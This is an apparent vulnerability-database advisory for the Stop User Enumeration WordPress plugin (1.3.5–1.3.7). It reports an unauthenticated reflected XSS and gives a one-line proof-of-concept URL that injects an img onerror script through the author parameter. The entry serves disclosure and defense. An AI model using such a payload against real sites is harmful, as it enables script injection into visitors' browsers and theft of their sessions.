WordPress Plugin Vulnerabilities
Stop User Enumeration 1.3.5-1.3.7 - Unauthenticated Reflected Cross-Site Scripting (XSS)
Description
The Stop User Enumeration WordPress plugin was affected by an Unauthenticated Reflected Cross-Site Scripting (XSS) security vulnerability.
Proof of Concept
http://www.example.com/?author=1<img src=x onerror=javascript:prompt(document.domain)>
Affects Plugins
References
Classification
Type
XSS
OWASP top 10
CWE
CVSS
Miscellaneous
Submitter
Zee Shan
Submitter twitter
Verified
No
WPVDB ID
Timeline
Publicly Published
2017-01-15 (about 7 years ago)
Added
2017-01-17 (about 7 years ago)
Last Updated
2020-09-22 (about 3 years ago)